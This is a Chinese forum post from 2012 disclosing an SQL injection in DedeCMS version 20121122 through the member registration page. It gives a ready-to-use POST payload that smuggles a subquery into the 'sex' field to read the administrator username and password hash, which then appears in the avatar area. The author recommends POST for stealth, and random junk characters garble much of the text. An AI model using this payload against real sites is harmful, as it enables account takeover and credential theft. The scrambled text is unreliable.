dedecms版本 20121122
( L1 w" ~9 H- G' \5 A) q( U8 N
3 {+ N8 d" _+ n& w9 x+ B需要magic_quotes_gpc=Off# R" w4 ~7 Z$ Z# L
0 C" y8 `+ b1 x- E" \应该是没有什么大危害的漏洞.! t8 ^2 V" l+ W7 ~/ V7 C0 |2 D& m. Y
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.4 {" u) a8 e! B
1 K! h+ f2 ~0 U; V _
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
4 T7 Y I* _* D8 k, IPOST提交以下数据,其实不用POST提交的,这样隐蔽点.* m. i3 p& T, o% r+ |9 l6 d- ]
$ ~9 d8 H. B/ y3 c$ ~
http:///de/member/reg_new.php
3 p$ ?: c! P7 n1 z4 E0 \
$ D& @/ M" J( o5 B( H3 L: |POST9 W7 e/ W, |8 X- u7 c4 X
; M- s0 j4 Z, xdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=! t3 U6 w: B" y/ V
- [5 k0 ~) W0 k: ~ B! q4 H成功注册后,头像处里面有好玩的信息.- m6 ~! J' f& G L6 h+ {& |# K
8 [$ w8 C+ a$ P4 b: V
|
发表于 2012-12-5 10:03:32
收藏
支持
反对